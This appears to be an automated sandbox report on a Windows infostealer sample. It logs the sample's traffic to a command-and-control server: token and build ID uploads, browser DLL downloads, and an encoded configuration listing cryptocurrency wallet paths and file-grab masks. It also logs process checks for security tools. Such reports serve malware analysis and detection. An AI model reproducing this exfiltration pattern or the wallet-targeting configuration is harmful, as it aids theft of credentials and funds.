8 | 192.168.2.5 | 49718 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:23 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 829
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:23 UTC | 829 | OUT | Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------JKJDAEBFCBKECBGDBFCFCont
2024-07-26 17:58:24 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:24 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49719 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:24 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:24 UTC | 437 | OUT | Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------BKJKJEHJJDAKECBFCGIDCont
2024-07-26 17:58:25 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:25 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49720 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:25 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 437
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:25 UTC | 437 | OUT | Data Ascii: ------DHJEBGIEBFIJKEBFBFHIContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------DHJEBGIEBFIJKEBFBFHIContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DHJEBGIEBFIJKEBFBFHICont
2024-07-26 17:58:26 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:26 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49721 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:27 UTC | 241 | OUT | GET /freebl3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:27 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:27 GMT
Content-Type: application/octet-stream
Content-Length: 685392
Connection: close
Last-Modified: Friday, 26-Jul-2024 17:58:27 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49722 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:28 UTC | 241 | OUT | GET /mozglue.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:29 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:29 GMT
Content-Type: application/octet-stream
Content-Length: 608080
Connection: close
Last-Modified: Friday, 26-Jul-2024 17:58:29 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes
                                                                                                  Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83
                                                                                                  Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                  2024-07-26 17:58:29 UTC16384INData Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0
                                                                                                  Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49723 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:30 UTC | 242 | OUT | GET /msvcp140.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:31 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:30 GMT
Content-Type: application/octet-stream
Content-Length: 450024
Connection: close
Last-Modified: Friday, 26-Jul-2024 17:58:30 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49724 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif

Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:32 UTC | 242 | OUT | GET /softokn3.dll HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:33 UTC | 260 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:32 GMT
Content-Type: application/octet-stream
Content-Length: 257872
Connection: close
Last-Modified: Friday, 26-Jul-2024 17:58:32 GMT
Cache-Control: no-store, no-cache
Accept-Ranges: bytes


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.5497255.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:34 UTC246OUTGET /vcruntime140.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:34 UTC | 259 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:34 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 80880
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:34 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49726 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:35 UTC | 238 | OUT | GET /nss3.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:36 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:36 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 2046288
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:36 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49727 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:39 UTC | 323 | OUT | POST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 1145
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:39 UTC | 1145 | OUT | Data Ascii:
------FIIECFHDBAAECAAKFHDH
Content-Disposition: form-data; name="token"

77eaecbc48c2111ef5dc32770e101018
------FIIECFHDBAAECAAKFHDH
Content-Disposition: form-data; name="build_id"

1a72eb06939ea478753d5c4df4b2bd32
------FIIECFHDBAAECAAKFHDH
Cont
2024-07-26 17:58:39 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:39 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
2024-07-26 17:58:39 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.5 | 49728 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:40 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----IIEHCFIDHIDGIDHJEHID
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:40 UTC | 331 | OUT | Data Ascii:
------IIEHCFIDHIDGIDHJEHID
Content-Disposition: form-data; name="token"

77eaecbc48c2111ef5dc32770e101018
------IIEHCFIDHIDGIDHJEHID
Content-Disposition: form-data; name="build_id"

1a72eb06939ea478753d5c4df4b2bd32
------IIEHCFIDHIDGIDHJEHID
Cont
2024-07-26 17:58:40 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:40 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:40 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49729 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:41 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----BKEHDGDGHCBGCAKFIIIE
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 331
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
2024-07-26 17:58:41 UTC | 331 | OUT | Data Ascii:
------BKEHDGDGHCBGCAKFIIIE
Content-Disposition: form-data; name="token"

77eaecbc48c2111ef5dc32770e101018
------BKEHDGDGHCBGCAKFIIIE
Content-Disposition: form-data; name="build_id"

1a72eb06939ea478753d5c4df4b2bd32
------BKEHDGDGHCBGCAKFIIIE
Cont
2024-07-26 17:58:42 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:42 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:42 UTC1524INData Raw: 35 65 38 0d 0a 52 6d 78 68 63 32 68 38 4a 55 52 53 53 56 5a 46 58 31 4a 46 54 55 39 57 51 55 4a 4d 52 53 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69
                                                                                                  Data Ascii: 5e8Rmxhc2h8JURSSVZFX1JFTU9WQUJMRSVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKi


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49730 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:42 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKK
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 465
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:42 UTC | 465 | OUT | Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DAFBGHCAKKFCAKEBKJKKCont
2024-07-26 17:58:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49731 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:44 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FIIECFHDBAAECAAKFHDH
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 130941
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:44 UTC | 16355 | OUT | Data Ascii: ------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------FIIECFHDBAAECAAKFHDHContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------FIIECFHDBAAECAAKFHDHCont
2024-07-26 17:58:46 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:46 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49732 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:47 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:47 UTC | 331 | OUT | Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------IIJDBGDGCGDAKFIDGIDBCont
2024-07-26 17:58:47 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:47 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49733 | 5.75.212.60 | 443 | 2380 | C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
Timestamp | Bytes transferred | Direction | Data
2024-07-26 17:58:48 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----CAEHJEBKFCAKKFIEHDBF
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
Host: 5.75.212.60
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-07-26 17:58:48 UTC | 331 | OUT | Data Ascii: ------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------CAEHJEBKFCAKKFIEHDBFContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------CAEHJEBKFCAKKFIEHDBFCont
2024-07-26 17:58:49 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 26 Jul 2024 17:58:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-07-26 17:58:49 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                  Target ID:0
                                                                                                  Start time:13:57:53
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:867'038 bytes
                                                                                                  MD5 hash:569720E2C07B1D34BAC1366BF2B1C97A
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low
                                                                                                  Has exited:true

                                                                                                  Target ID:2
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /k move Ruth Ruth.cmd & Ruth.cmd & exit
                                                                                                  Imagebase:0x790000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:3
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6d64d0000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  Target ID:4
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:tasklist
                                                                                                  Imagebase:0x1000000
                                                                                                  File size:79'360 bytes
                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:5
                                                                                                  Start time:13:57:56
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                                                                  Imagebase:0xb90000
                                                                                                  File size:29'696 bytes
                                                                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:6
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:tasklist
                                                                                                  Imagebase:0x1000000
                                                                                                  File size:79'360 bytes
                                                                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  Target ID:7
                                                                                                  Start time:13:57:57
                                                                                                  Start date:26/07/2024
                                                                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                  Wow64 process (32bit):true
